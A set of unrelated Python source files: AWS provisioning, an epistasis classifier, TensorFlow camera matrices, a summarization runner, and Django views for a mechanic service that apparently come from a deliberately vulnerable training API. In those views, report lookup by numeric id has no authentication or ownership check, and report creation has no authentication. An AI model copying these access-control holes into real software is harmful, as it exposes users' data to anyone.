'No private key path found! Configure one using:\n $ oct configure aws-client private_key_path PATH'
)
playbook_variables = {
'origin_ci_aws_hostname': configuration.next_available_vagrant_name, # TODO: fix this
'origin_ci_aws_ami_os': operating_system,
'origin_ci_aws_ami_stage': stage,
'origin_ci_aws_instance_name': name,
'origin_ci_inventory_dir': configuration.ansible_client_configuration.host_list,
'origin_ci_aws_keypair_name': configuration.aws_client_configuration.keypair_name,
'origin_ci_aws_private_key_path': configuration.aws_client_configuration.private_key_path,
'origin_ci_ssh_config_strategy': 'discrete' if discrete_ssh_config else 'update',
'openshift_schedulable': True,
'openshift_node_labels': {
'region': 'infra',
'zone': 'default',
},
}
if ami_id is not None:
playbook_variables['origin_ci_aws_ami_id'] = ami_id
configuration.run_playbook(
playbook_relative_path='provision/aws-up',
playbook_variables=playbook_variables,
)
if stage == Stage.bare:
# once we have the new host, we must partition the space on it
# that was set aside for Docker storage, then update the kernel
# partition tables and set up the volume group backed by the LVM
# pool
configuration.run_playbook(playbook_relative_path='provision/aws-docker-storage', )
|
the-stack_106_14865
|
__description__ = \
"""
Logistic classifier model.
"""
__author__ = "Zach Sailer"
from epistasis.models.base import BaseModel, use_sklearn
from epistasis.models.utils import arghandler
from .base import EpistasisClassifierMixin
from sklearn.linear_model import LogisticRegression
from sklearn.preprocessing import binarize
import numpy as np
import pandas as pd
@use_sklearn(LogisticRegression)
class EpistasisLogisticRegression(EpistasisClassifierMixin, BaseModel):
"""
Logistic regression for estimating epistatic interactions that lead to
nonviable phenotypes. Useful for predicting viable/nonviable phenotypes.
Parameters
----------
threshold : float
value below which phenotypes are considered nonviable.
order : int
order of epistasis model
model_type : str (default="global")
type of model matrix to use. "global" defines epistasis with respect to
a background-averaged "genotype-phenotype". "local" defines epistasis
with respect to the wildtype genotype.
"""
def __init__(self, threshold=0.2, model_type="global", **kwargs):
super(self.__class__, self).__init__(**kwargs)
self.threshold = threshold
self.model_type = model_type
self.fit_intercept = False
self.order = 1
self.Xbuilt = {}
# Store model specs.
self.model_specs = dict(
threshold=self.threshold,
model_type=self.model_type,
**kwargs)
@arghandler
def fit(self, X=None, y=None, **kwargs):
# Use Additive model to establish the phenotypic scale.
# Prepare Additive model
self._fit_additive(X=X, y=y)
self._fit_classifier(X=X, y=y)
self.epistasis.values = self.coef_[0]
return self
@property
def num_of_params(self):
n = 0
n += self.epistasis.n
return n
@arghandler
def score(self, X=None, y=None, **kwargs):
yclass = binarize(y.reshape(1, -1), threshold=self.threshold)[0]
return super(self.__class__, self).score(X=X, y=yclass)
@arghandler
def lnlike_of_data(self, X=None, y=None, yerr=None, thetas=None):
# Calculate Y's
ymodel = self.hypothesis(X=X, thetas=thetas)
ymodel_ = 1 - ymodel
ymodel[ymodel < 0.5] = ymodel_[ymodel < 0.5]
return np.log(ymodel)
@arghandler
def lnlike_transform(
self,
X=None,
y=None,
yerr=None,
lnprior=None,
thetas=None):
# Update likelihood.
ymodel = self.hypothesis(X=X, thetas=thetas)
yclass = np.ones(len(ymodel))
yclass[ymodel > 0.5] = 0
lnlike = self.lnlike_of_data(X=X, y=y, yerr=yerr, thetas=thetas)
lnprior[yclass == 0] = 0
return lnlike + lnprior
@arghandler
def hypothesis(self, X=None, thetas=None):
# Calculate probability of each class
logit_p0 = 1 / (1 + np.exp(np.dot(X, thetas)))
# Returns probability of class 1
return logit_p0
def hypothesis_transform(self, X=None, y=None, thetas=None):
ypred = self.hypothesis(X=X, thetas=thetas)
y[ypred > 0.5] = self.threshold
return y
@property
def thetas(self):
return self.epistasis.values
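# A minimal usage sketch (illustrative only): `gpm` and the `add_gpm` call are
# assumptions about the surrounding epistasis package API, not defined here.
#
#   model = EpistasisLogisticRegression(threshold=0.2, model_type="global")
#   model.add_gpm(gpm)     # attach a genotype-phenotype map (assumed helper)
#   model.fit()            # classifies phenotypes as viable/nonviable
#   classes = model.predict()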
|
the-stack_106_14866
|
# Copyright 2020 Traceable, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
contains all the views related to Mechanic
"""
import bcrypt
from django.utils import timezone
from django.views.decorators.csrf import csrf_exempt
from django.urls import reverse
from rest_framework import status
from rest_framework.response import Response
from rest_framework.views import APIView
from django.db import models
from utils.jwt import jwt_auth_required
from utils import messages
from user.models import User, Vehicle, UserDetails
from utils.logging import log_error
from .models import Mechanic, ServiceRequest
from .serializers import MechanicSerializer, ServiceRequestSerializer, ReceiveReportSerializer, SignUpSerializer
class SignUpView(APIView):
"""
Used to add a new mechanic
"""
@csrf_exempt
def post(self, request):
"""
creates a new Mechanic in the db
:param request: http request for the view
method allowed: POST
mandatory fields: ['name', 'email', 'number', 'password', 'mechanic_code']
:returns Response object with
mechanics list and 200 status if no error
message and corresponding status if error
"""
serializer = SignUpSerializer(data=request.data)
if not serializer.is_valid():
log_error(request.path, request.data, status.HTTP_400_BAD_REQUEST, serializer.errors)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
mechanic_details = serializer.data
if User.objects.filter(email=mechanic_details['email']).exists():
return Response({'message': messages.EMAIL_ALREADY_EXISTS}, status=status.HTTP_400_BAD_REQUEST)
if Mechanic.objects.filter(mechanic_code=mechanic_details['mechanic_code']).exists():
return Response({'message': messages.MEC_CODE_ALREADY_EXISTS}, status=status.HTTP_400_BAD_REQUEST)
try:
user_id = User.objects.aggregate(models.Max('id'))['id__max'] + 1
except TypeError:
user_id = 1
user = User.objects.create(
id=user_id,
email=mechanic_details['email'],
number=mechanic_details['number'],
password=bcrypt.hashpw(
mechanic_details['password'].encode('utf-8'),
bcrypt.gensalt()
).decode(),
role=User.ROLE_CHOICES.MECH,
created_on=timezone.now()
)
Mechanic.objects.create(
mechanic_code=mechanic_details['mechanic_code'],
user=user
)
try:
user_details_id = UserDetails.objects.aggregate(models.Max('id'))['id__max'] + 1
except TypeError:
user_details_id = 1
UserDetails.objects.create(
id=user_details_id,
available_credit=0,
name=mechanic_details['name'],
status='ACTIVE',
user=user
)
return Response({'message': messages.MEC_CREATED.format(user.email)}, status=status.HTTP_200_OK)
class MechanicView(APIView):
"""
Mechanic view to fetch all the mechanics
"""
@jwt_auth_required
def get(self, request, user=None):
"""
get_mechanic view for fetching the list of mechanics
:param request: http request for the view
method allowed: GET
http request should be authorised by the jwt token of the user
:param user: User object of the requesting user
:returns Response object with
mechanics list and 200 status if no error
message and corresponding status if error
"""
mechanics = Mechanic.objects.all()
serializer = MechanicSerializer(mechanics, many=True)
response_data = dict(
mechanics=serializer.data
)
return Response(response_data, status=status.HTTP_200_OK)
class ReceiveReportView(APIView):
"""
View to receive report from contact mechanic feature
"""
def get(self, request):
"""
receive_report endpoint for mechanic
:param request: http request for the view
        method allowed: GET
mandatory fields: ['mechanic_code', 'problem_details', 'vin']
:returns Response object with
{ service request id, report link } and 200 status if no error
message and corresponding status if error
"""
serializer = ReceiveReportSerializer(data=request.GET)
if not serializer.is_valid():
log_error(request.path, request.data, status.HTTP_400_BAD_REQUEST, serializer.errors)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
report_details = serializer.data
mechanic = Mechanic.objects.get(mechanic_code=report_details['mechanic_code'])
vehicle = Vehicle.objects.get(vin=report_details['vin'])
service_request = ServiceRequest.objects.create(
vehicle=vehicle,
mechanic=mechanic,
problem_details=report_details['problem_details'],
created_on=timezone.now()
)
service_request.save()
report_link = "{}?report_id={}".format(reverse("get-mechanic-report"), service_request.id)
report_link = request.build_absolute_uri(report_link)
return Response({
'id': service_request.id,
'sent': True,
'report_link': report_link
}, status=status.HTTP_200_OK)
class GetReportView(APIView):
"""
View to get only particular service request
"""
def get(self, request):
"""
fetch service request details from report_link
:param request: http request for the view
method allowed: GET
:returns Response object with
service request object and 200 status if no error
message and corresponding status if error
"""
report_id = request.GET['report_id']
if not report_id:
return Response(
{'message': messages.REPORT_ID_MISSING},
status=status.HTTP_400_BAD_REQUEST
)
if not report_id.isnumeric():
return Response(
{'message': messages.INVALID_REPORT_ID, 'vowner': 'owner'},
status=status.HTTP_400_BAD_REQUEST
)
service_request = ServiceRequest.objects.filter(id=report_id).first()
if not service_request:
return Response(
{'message': messages.REPORT_DOES_NOT_EXIST, 'vowner': 'owner'},
status=status.HTTP_400_BAD_REQUEST
)
serializer = ServiceRequestSerializer(service_request)
response_data = dict(serializer.data)
return Response(response_data, status=status.HTTP_200_OK)
class ServiceRequestsView(APIView):
"""
View to return all the service requests
"""
@jwt_auth_required
def get(self, request, user=None):
"""
fetch all service requests assigned to the particular mechanic
:param request: http request for the view
method allowed: GET
http request should be authorised by the jwt token of the mechanic
:param user: User object of the requesting user
:returns Response object with
list of service request object and 200 status if no error
message and corresponding status if error
"""
service_requests = ServiceRequest.objects.filter(mechanic__user=user)
serializer = ServiceRequestSerializer(service_requests, many=True)
response_data = dict(
service_requests=serializer.data
)
return Response(response_data, status=status.HTTP_200_OK)
|
the-stack_106_14867
|
# Copyright 2017 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Collection of TF functions for managing 3D camera matrices."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import tensorflow as tf
def perspective(aspect_ratio, fov_y, near_clip, far_clip):
"""Computes perspective transformation matrices.
Functionality mimes gluPerspective (third_party/GL/glu/include/GLU/glu.h).
Args:
aspect_ratio: float value specifying the image aspect ratio (width/height).
fov_y: 1-D float32 Tensor with shape [batch_size] specifying output vertical
field of views in degrees.
near_clip: 1-D float32 Tensor with shape [batch_size] specifying near
clipping plane distance.
far_clip: 1-D float32 Tensor with shape [batch_size] specifying far clipping
plane distance.
Returns:
A [batch_size, 4, 4] float tensor that maps from right-handed points in eye
space to left-handed points in clip space.
"""
# The multiplication of fov_y by pi/360.0 simultaneously converts to radians
# and adds the half-angle factor of .5.
focal_lengths_y = 1.0 / tf.tan(fov_y * (math.pi / 360.0))
depth_range = far_clip - near_clip
p_22 = -(far_clip + near_clip) / depth_range
p_23 = -2.0 * (far_clip * near_clip / depth_range)
zeros = tf.zeros_like(p_23, dtype=tf.float32)
# pyformat: disable
perspective_transform = tf.concat(
[
focal_lengths_y / aspect_ratio, zeros, zeros, zeros,
zeros, focal_lengths_y, zeros, zeros,
zeros, zeros, p_22, p_23,
zeros, zeros, -tf.ones_like(p_23, dtype=tf.float32), zeros
], axis=0)
# pyformat: enable
perspective_transform = tf.reshape(perspective_transform, [4, 4, -1])
return tf.transpose(perspective_transform, [2, 0, 1])
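# A small sketch of evaluating `perspective` (TF1-style session; the literal
# values are placeholders chosen only for illustration):
#
#   fov_y = tf.constant([40.0])
#   near, far = tf.constant([0.01]), tf.constant([10.0])
#   proj = perspective(aspect_ratio=1.0, fov_y=fov_y, near_clip=near, far_clip=far)
#   with tf.Session() as sess:
#       print(sess.run(proj).shape)  # (1, 4, 4)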
def look_at(eye, center, world_up):
"""Computes camera viewing matrices.
Functionality mimes gluLookAt (third_party/GL/glu/include/GLU/glu.h).
Args:
eye: 2-D float32 tensor with shape [batch_size, 3] containing the XYZ world
space position of the camera.
center: 2-D float32 tensor with shape [batch_size, 3] containing a position
along the center of the camera's gaze.
world_up: 2-D float32 tensor with shape [batch_size, 3] specifying the
world's up direction; the output camera will have no tilt with respect
to this direction.
Returns:
A [batch_size, 4, 4] float tensor containing a right-handed camera
extrinsics matrix that maps points from world space to points in eye space.
"""
batch_size = center.shape[0].value
vector_degeneracy_cutoff = 1e-6
forward = center - eye
forward_norm = tf.norm(forward, ord='euclidean', axis=1, keep_dims=True)
tf.assert_greater(
forward_norm,
vector_degeneracy_cutoff,
message='Camera matrix is degenerate because eye and center are close.')
forward = tf.divide(forward, forward_norm)
to_side = tf.cross(forward, world_up)
to_side_norm = tf.norm(to_side, ord='euclidean', axis=1, keep_dims=True)
tf.assert_greater(
to_side_norm,
vector_degeneracy_cutoff,
message='Camera matrix is degenerate because up and gaze are close or'
'because up is degenerate.')
to_side = tf.divide(to_side, to_side_norm)
cam_up = tf.cross(to_side, forward)
w_column = tf.constant(
batch_size * [[0., 0., 0., 1.]], dtype=tf.float32) # [batch_size, 4]
w_column = tf.reshape(w_column, [batch_size, 4, 1])
view_rotation = tf.stack(
[to_side, cam_up, -forward,
tf.zeros_like(to_side, dtype=tf.float32)],
axis=1) # [batch_size, 4, 3] matrix
view_rotation = tf.concat(
[view_rotation, w_column], axis=2) # [batch_size, 4, 4]
identity_batch = tf.tile(tf.expand_dims(tf.eye(3), 0), [batch_size, 1, 1])
view_translation = tf.concat([identity_batch, tf.expand_dims(-eye, 2)], 2)
view_translation = tf.concat(
[view_translation,
tf.reshape(w_column, [batch_size, 1, 4])], 1)
camera_matrices = tf.matmul(view_rotation, view_translation)
return camera_matrices
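# Corresponding sketch for `look_at` (shapes only; the tensors are illustrative):
#
#   eye = tf.constant([[0.0, 0.0, 5.0]])      # [1, 3]
#   center = tf.constant([[0.0, 0.0, 0.0]])   # [1, 3]
#   up = tf.constant([[0.0, 1.0, 0.0]])       # [1, 3]
#   extrinsics = look_at(eye, center, up)     # [1, 4, 4]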
def euler_matrices(angles):
"""Computes a XYZ Tait-Bryan (improper Euler angle) rotation.
Returns 4x4 matrices for convenient multiplication with other transformations.
Args:
angles: a [batch_size, 3] tensor containing X, Y, and Z angles in radians.
Returns:
a [batch_size, 4, 4] tensor of matrices.
"""
s = tf.sin(angles)
c = tf.cos(angles)
# Rename variables for readability in the matrix definition below.
c0, c1, c2 = (c[:, 0], c[:, 1], c[:, 2])
s0, s1, s2 = (s[:, 0], s[:, 1], s[:, 2])
zeros = tf.zeros_like(s[:, 0])
ones = tf.ones_like(s[:, 0])
# pyformat: disable
flattened = tf.concat(
[
c2 * c1, c2 * s1 * s0 - c0 * s2, s2 * s0 + c2 * c0 * s1, zeros,
c1 * s2, c2 * c0 + s2 * s1 * s0, c0 * s2 * s1 - c2 * s0, zeros,
-s1, c1 * s0, c1 * c0, zeros,
zeros, zeros, zeros, ones
],
axis=0)
# pyformat: enable
reshaped = tf.reshape(flattened, [4, 4, -1])
return tf.transpose(reshaped, [2, 0, 1])
|
the-stack_106_14870
|
from __future__ import print_function, unicode_literals
import hashlib
import json
import logging
import math
import os
import re
from os import path
import dill as pickle
import pandas as pd
from algorithms.flight_recorder import FlightRecorder, Record
from algorithms.oracle.human_oracle import HumanOracle
from algorithms.simulated_feedback import SimulatedFeedback
from algorithms.upper_bound_ilp import ExtractiveUpperbound
from baselines.sume_wrap import SumeWrap
from model.topic import Topic
from rouge.rouge import Rouge
from utils.data_helpers import load_w2v_embeddings
from utils.writer import write_to_file, write_details_file
from utils.load_clusters import get_clusters
import random
from performance_utils.mlogger import MeasurementLogger
from performance_utils.timer import IterationTimer, RunTimer
from performance_utils.mreader import MeasurementReader
import threading
def roundup(x):
return int(math.ceil(x / 100.0)) * 100
def get_k_limit(data_set, topic):
# dumsum = sume.ConceptBasedILPSummarizer(" ", language, True)
# dumsum.sentences = SumeWrap(language).load_sume_sentences(docs, parser_type, parse_info)
# dumsum.prune_sentences(remove_citations=True, remove_redundancy=True, imp_list=[])
# topic_sentence_size = len(dumsum.sentences)
from log_folder import log_folder
mreader = MeasurementReader()
mreader.info['dataset'] = data_set
mreader.read_corpora_stats(log_folder)
mreader.set_topic_rid(topic)
topic_sentence_size = mreader.get_corpus_stat("Corpus Size after")
return topic_sentence_size
def get_flightrecorder_from_file(weights_file=None):
"""
Parses a json containing the feedbacks. And verifies its layout.
:param weights_file:
:return: dict of str -> double
"""
flightrecorder = FlightRecorder()
if weights_file is None:
return flightrecorder
elif weights_file.endswith(".json"):
df = pd.read_json(path.normpath(weights_file))
elif weights_file.endswith(".csv"):
df = pd.read_csv(path.normpath(weights_file))
record = Record()
last_iteration = 0
for row in df.iterrows():
if row[1].iteration > last_iteration:
flightrecorder.add_record(record)
record = Record()
last_iteration = row[1].iteration
if row[1].value.lower() == "accept":
record.accept.union_update([row[1].concept])
elif row[1].value.lower() == "reject":
record.reject.union_update([row[1].concept])
elif row[1].value.lower() == "implicit_reject":
record.implicit_reject.union_update([row[1].concept])
flightrecorder.add_record(record)
return flightrecorder
def load_ub_summary(language, docs, models, size, ngram_type=2,
base_dir=path.normpath(path.expanduser("~/.ukpsummarizer/cache/"))):
import hashlib
m = hashlib.sha256()
shortened_docs = [path.split(f)[1] for (f, _) in docs]
for doc in sorted(shortened_docs):
m.update(doc)
shortened_models = [path.split(f)[1] for (f, _) in models]
for model in sorted(shortened_models):
m.update(model)
m.update(str(size))
m.update(language)
m.update(str(ngram_type))
h = m.hexdigest()
jsonloc = path.normpath(path.join(base_dir, h + ".json"))
if path.isfile(jsonloc):
try:
ubs = json.load(open(jsonloc))
upsum = ubs["summary"]
return upsum
except:
pass
upsum = ExtractiveUpperbound(language)
ub_summary = upsum(docs, models, size, ngram_type)
jdict = {"docs": sorted(shortened_docs), "summary": ub_summary, "models": sorted(shortened_models), "size": size,
"language": language, "ngram_type": ngram_type}
j = json.dumps(jdict)
write_to_file(j, jsonloc)
return ub_summary
def convert_to_json(sentences):
"""
:param sentences: list(baselines.sume.base.Sentence)
:return:
"""
log = logging.getLogger()
for s in sentences:
t = {
"untokenized_form": s.untokenized_form,
"concepts": s.concepts,
"untokenized_concepts": s.untokenized_concepts,
"doc_id": s.doc_id,
"sent_id": s.position,
"length": s.length,
"tokens": s.tokens,
"phrases": s.phrases,
"untokenized_phrases": s.raw_phrases
}
yield t
class SingleTopicRunner(object):
tlog = logging.getLogger("timings")
def __init__(self, iobasedir, rouge_dir, out=None, scores_dir=None, override_results_files=False,
pickle_store=None, k=0.1):
self.iobasedir = path.normpath(path.expanduser(iobasedir))
# resolved_rouge_dir = path.normpath(path.expanduser(rouge_dir))
self.rouge = Rouge(rouge_dir)
self.k = k
if out is None:
self.out = None
else:
self.out = path.normpath(path.expanduser(out))
if scores_dir is None:
self.scores_storage_path = path.normpath(path.join(self.iobasedir, "scores_new"))
else:
self.scores_storage_path = path.normpath(path.join(self.iobasedir, scores_dir))
if not path.exists(self.scores_storage_path):
os.mkdir(self.scores_storage_path)
self.override_results_switch = override_results_files
if pickle_store is None:
self.pickle_store = pickle_store
else:
p, f = path.split(path.join(self.iobasedir, pickle_store))
if path.exists(p):
self.pickle_store = path.join(self.iobasedir, pickle_store)
else:
p, f = path.split(pickle_store)
if (path.exists(p)):
self.pickle_store = pickle_store
else:
raise BaseException(
"Cannot resolve %s to a existing path for storing the serialized summarizer" % (pickle_store))
def single_iteration(self, picklein, pickleout=None, feedbacks=None):
log = logging.getLogger("SingleTopicRunner")
log.info("unpickling input %s" % (picklein))
sf = pickle.load(open(picklein, 'rb'))
log.info("done unpick input")
iteration = len(sf.flight_recorder.records) + 1
labeled_data = feedbacks or []
svm_flag = 0
sf.oracle = HumanOracle(labeled_data)
if 'k_size' in labeled_data:
            self.k = labeled_data['k_size']
if sf.k != self.k:
log.info("recording k_size in continue %f", sf.k)
log.info("recording sentence size in continue %d", len(sf.summarizer.sentences))
sf.k = self.k
if sf.run_config['rank_subset']:
sf.summarizer.sentences = sf.summarizer.all_sentences
sf.summarizer.weights = sf.sentence_ranker.all_concept_weights
sf.initialize_sentence_ranking()
log.info("recording k_size in continue %f", sf.k)
log.info("recording sentence size in continue %d", len(sf.summarizer.sentences))
log.info("records before: %s", len(sf.flight_recorder.records))
log.info("running iteration")
samples = [i["concept"] for i in labeled_data]
score, summary, summary_sentences, unlabeled_data, exploratory_sentences = sf.single_iteration(iteration,
samples,
svm_flag)
sf.__print_iteration_info__(summary_sentences, iteration, summary, score,
unlabeled_data, exploratory_sentences)
log.info("records after run: %s", len(sf.flight_recorder.records))
self.write_continue_output_result(sf,
unlabeled_data,
picklein,
pickleout,
summary,
summary_sentences,
exploratory_sentences)
if pickleout is not None:
self.pickle_write(sf, pickleout, log)
def pickle_write(self, sf, pickleout, log):
output = open(pickleout, 'wb')
pickle.dump(sf, output)
output.close()
log.info("### wrote pickle output to %s" % (pickleout))
def run(self, topic_path, size=None, summarizer="SUME", summary_idx=None, parser=None,
oracle="accept", feedback_log=None, propagation=False, max_iteration_count=10, preload_embeddings=None,
feedbackstore=None, override_results_files=False, num_clusters=8):
log = logging.getLogger("SingleTopicRunner")
sf = None # just for the sake of being able to run without simulated feedback...
self.tlog.debug("SingleTopicRunner started")
# relativize the topic path!
if type(topic_path) is Topic:
topic = topic_path
else:
if topic_path.startswith("/"):
relative_path = re.search('^(/)(.*)$', topic_path).group(2)
else:
relative_path = topic_path
topic = Topic(path.join(self.iobasedir, path.normpath(relative_path)))
language = topic.get_language()
docs = topic.get_docs()
summaries = topic.get_models()
flightrecorder = get_flightrecorder_from_file(feedback_log)
preceding_size = len(
flightrecorder.records) # the number of iterations that happened due to the provided feedback_log
embeddings = None
"""
if preload_embeddings:
embeddings_path = path.normpath(path.join(self.iobasedir, "embeddings"))
embeddings = load_w2v_embeddings(embeddings_path, language, 'active_learning')
else:
embeddings = preload_embeddings
"""
if summary_idx is not None:
summaries = [summaries[summary_idx]]
if size is None:
use_size = topic.get_summary_size()
else:
use_size = size
clusters_path = path.join(self.iobasedir, 'clustering', '{}'.format(num_clusters))
#print(clusters_path)
#clusters = get_clusters(clusters_path, topic.docs_dir)
if summarizer == "SUME":
sw = SumeWrap(language)
summary = sw(docs, use_size)
outputfilecontents = {"summary": summary, "type": summarizer, "info_data": []}
json_content = json.dumps(outputfilecontents)
if self.out is not None:
log.info("writing output to %s" % (self.out))
write_to_file(json_content, self.out)
write_to_file(json_content,
path.normpath(path.expanduser(path.join(self.iobasedir, "tmp", "tmp.json"))))
elif summarizer == "UPPER_BOUND":
ub_summary = load_ub_summary(language, docs, summaries, use_size, base_dir=self.iobasedir)
summary = '\n'.join(ub_summary)
outputfilecontents = {"summary": summary, "type": summarizer, "info_data": []}
json_content = json.dumps(outputfilecontents)
if self.out is not None:
log.info("writing output to %s" % (self.out))
write_to_file(json_content, self.out)
write_to_file(json_content, path.normpath(path.expanduser(path.join(self.iobasedir, "tmp", "tmp.json"))))
elif summarizer == "PROPAGATION":
#UB considering all the summaries
ub_summary = load_ub_summary(language, docs, summaries, use_size, base_dir=self.iobasedir)
summary = '\n'.join(ub_summary)
ub_scores = self.rouge(summary, summaries, use_size)
log.debug("UB scores: R1:%s R2:%s SU4:%s" % (str(ub_scores[0]), str(ub_scores[1]), str(ub_scores[2])))
ref_summ = random.choice(summaries)
parse_info = []
#parse_info = topic.get_parse_info(summaries.index(ref_summ))
# initialize the Algorithm.
run_config = dict()
run_config['rank_subset'] = True
run_config['relative_k'] = True
run_config['dynamic_k'] = False
for flag in ['adaptive_sampling', 'strategy']:
run_config[flag] = False
r = 0
clusters = None
log.info("recording k_size in summarize %f", self.k)
#TODO: Added summaries instead of one single summary
sf = SimulatedFeedback(language, self.rouge, embeddings=None, #TODO: embeddings
docs=docs, models=summaries,
summary_length=use_size,
oracle_type=oracle,
ub_score=ub_scores, ub_summary=ub_summary,
parser_type=parser, flightrecorder=flightrecorder,
feedbackstore=feedbackstore, parse_info=parse_info,
run_config=run_config, k=self.k, adaptive_window_size=r, clusters=clusters)
if sf.embeddings is None or sf.embeddings == {}:
                embe_var = "none"
else:
if sf.embeddings.embedding_variant is None:
embe_var = "none"
else:
embe_var = sf.embeddings.embedding_variant
if feedbackstore is None:
cfg = {"type": "Unconfigured default"}
else:
cfg = feedbackstore.get_config()
rs = []
for p, t in [ref_summ]:
rs.append({
"name": os.path.split(p)[1],
"text": t})
run_id_string = "%s-%s-%s-%s-%s-%s-%s-%s" % (
oracle, summarizer, parser, embe_var, topic.get_dataset(), topic.get_name(),
[item["name"] for item in rs], json.dumps(cfg))
run_id = hashlib.sha224(run_id_string).hexdigest()
filename = path.join(self.scores_storage_path, "result-%s.json" % (run_id))
if (os.path.exists(filename)
and self.out is None
and self.override_results_switch is False):
log.info("Skipping run_id '%s' because the result file does already exist. config: %s" % (
run_id, run_id_string))
return
else:
log.info("Doing %s iterations for run_id '%s'\n %s" % (max_iteration_count, run_id, run_id_string))
write_to_file("", filename)
summary, confirmatory_summary, exploratory_summary = sf.run_full_simulation(
max_iteration_count=max_iteration_count)
recommendations, recom_sentences = sf.get_recommendations()
derived_records = []
# construct table-like array of feedbacks per iteration.
for i, record in enumerate(sf.flight_recorder.records):
for accept in record.accept:
derived_records.append({
"iteration": i,
"concept": accept,
"value": "accept"
})
for reject in record.reject:
derived_records.append({
"iteration": i,
"concept": reject,
"value": "reject"
})
for implicit_reject in record.implicit_reject:
derived_records.append({
"iteration": i,
"concept": implicit_reject,
"value": "implicit_reject"
})
for item in recommendations:
derived_records.append({
"iteration": -1,
"concept": item,
"value": "recommendation",
"weight": sf.summarizer.weights.get(item, 0.0),
"uncertainity": sf.svm_uncertainity.get(item, -1.0)
})
result = {
"config_run_id": run_id,
"config_oracle_type": oracle,
"config_summarizer_type": summarizer,
"config_parse_type": str(parser),
#"config_wordembeddings": emb_var,
"config_feedbackstore": sf.feedbackstore.get_config(),
"config_feedback_interpretation": {},
"config_concept_recommendation": {},
"dataset": topic.get_dataset(),
"topic": topic.get_name(),
"models": rs,
"model_rougescores": {
"iteration": -1,
"ROUGE-1 R score": ub_scores[0],
"ROUGE-2 R score": ub_scores[1],
"ROUGE-SU* R score": ub_scores[2],
"accepted": [],
"accept_count": 0,
"rejected": [],
"reject_count": 0,
"summary": ub_summary
},
"result_summary": summary,
"result_rougescores": sf.log_sir_info_data,
"log_feedbacks": derived_records
}
r2 = [{"iteration": i, "summary": sf.log_info_data[i]} for i in
range(len(sf.flight_recorder.records))]
log.debug(
"records: %s, infos %s, diff: %s" % (len(sf.flight_recorder.records), len(sf.log_info_data),
len(sf.flight_recorder.records) - len(sf.log_info_data)))
write_to_file(json.dumps(result), filename)
log.info("Writing results to %s" % (filename))
df = pd.DataFrame(derived_records)
filename = path.join(self.scores_storage_path, "flightrecorder-%s.csv" % (run_id))
log.info("saving flightrecorder to %s with run_id %s" % (filename, run_id))
df.to_csv(filename, encoding="UTF-8")
write_to_file(json.dumps(sf.new_debug_weights_history),
path.join(self.scores_storage_path, "weightshistory-%s-%s-%s-%s.json" % (
topic.get_dataset(), topic.get_name(), summarizer, run_id)))
log.info("Writing weights history to %s" % (filename))
weights_hist = pd.DataFrame(sf.new_debug_weights_history)
filename = path.join(self.scores_storage_path, "weightshistory-%s.csv" % (run_id))
weights_hist.to_csv(filename, encoding="UTF-8")
log.debug("----------------------------------------------")
log.debug(summary)
log.debug(sf.log_info_data[-1])
log.debug("----------------------------------------------")
if self.pickle_store is not None:
# Pickle dictionary using protocol 0.
print('Pickle in file %s' % self.pickle_store)
self.pickle_write(sf, self.pickle_store, log)
json_content = self.write_summarize_output_json(sf, confirmatory_summary, derived_records, log,
recom_sentences, result, run_id, summarizer,
summary, self.pickle_store)
# write_to_file(json_content, path.normpath(path.expanduser(path.join(self.iobasedir, "tmp", "tmp.json"))))
else:
raise BaseException("You should tell which summarizer to use")
if sf is not None:
write_details_file([sf.log_info_data], path.join(self.iobasedir, "tmp", "tmp.csv"))
self.tlog.debug("SingleTopicRunner finished")
def write_continue_output_result(self,
sf,
unlabeled_data=None,
picklein=None,
pickleout=None,
summary=None,
summary_sentences=None,
exploratory_sentences=None):
log = logging.getLogger("SingleTopicRunner")
if self.out is not None:
derived_records = []
# construct table-like array of feedbacks per iteration.
for i, record in enumerate(sf.flight_recorder.records):
for accept in record.accept:
derived_records.append({
"iteration": i,
"concept": accept,
"value": "accept"
})
for reject in record.reject:
derived_records.append({
"iteration": i,
"concept": reject,
"value": "reject"
})
for implicit_reject in record.implicit_reject:
derived_records.append({
"iteration": i,
"concept": implicit_reject,
"value": "implicit_reject"
})
for item in unlabeled_data:
if item not in [i.get("concept", "") for i in derived_records]:
derived_records.append({
"iteration": -1,
"concept": item,
"value": "recommendation",
"weight": sf.summarizer.weights.get(item, 0.0),
"uncertainity": sf.svm_uncertainity.get(item, -1.0)
})
else:
log.info("recommendation included a already labeled instance, '%s'" % (item))
outputfilecontents = {
"picklein": picklein,
"pickleout": pickleout,
"summary": summary,
"confirmatory_summary": list(summary_sentences),
"exploratory_summary": list(exploratory_sentences),
"weights": sf.summarizer.weights,
"fbs_weights": dict(sf.feedbackstore.get_weights()),
"sentence_ids": list(summary_sentences),
"details": derived_records,
"score": sf.log_sir_info_data
}
write_to_file(json.dumps(outputfilecontents), self.out)
log.info("writing output to %s" % (self.out))
log.info("done writing output")
def write_summarize_output_json(self, sf, confirmatory_summary, derived_records, log, recom_sentences,
result, run_id, summarizer, summary, pickle_store=None):
# convert the sentences into a jsonizable structure:
sents = convert_to_json(sf.summarizer.sentences)
outputfilecontents = {
"picklein": None,
"pickleout": pickle_store,
"summary": summary,
"confirmatory_summary": list(confirmatory_summary),
"exploratory_summary": list(recom_sentences),
"type": summarizer,
"run_id": run_id,
"weights": sf.summarizer.weights,
"fbs_weights": dict(sf.feedbackstore.get_weights()),
"details": derived_records,
"sentences": list(sents),
"full": result,
"score": sf.log_sir_info_data
}
json_content = json.dumps(outputfilecontents)
if self.out is not None:
log.info("writing output to %s" % (self.out))
write_to_file(json_content, self.out)
return json_content
|
the-stack_106_14871
|
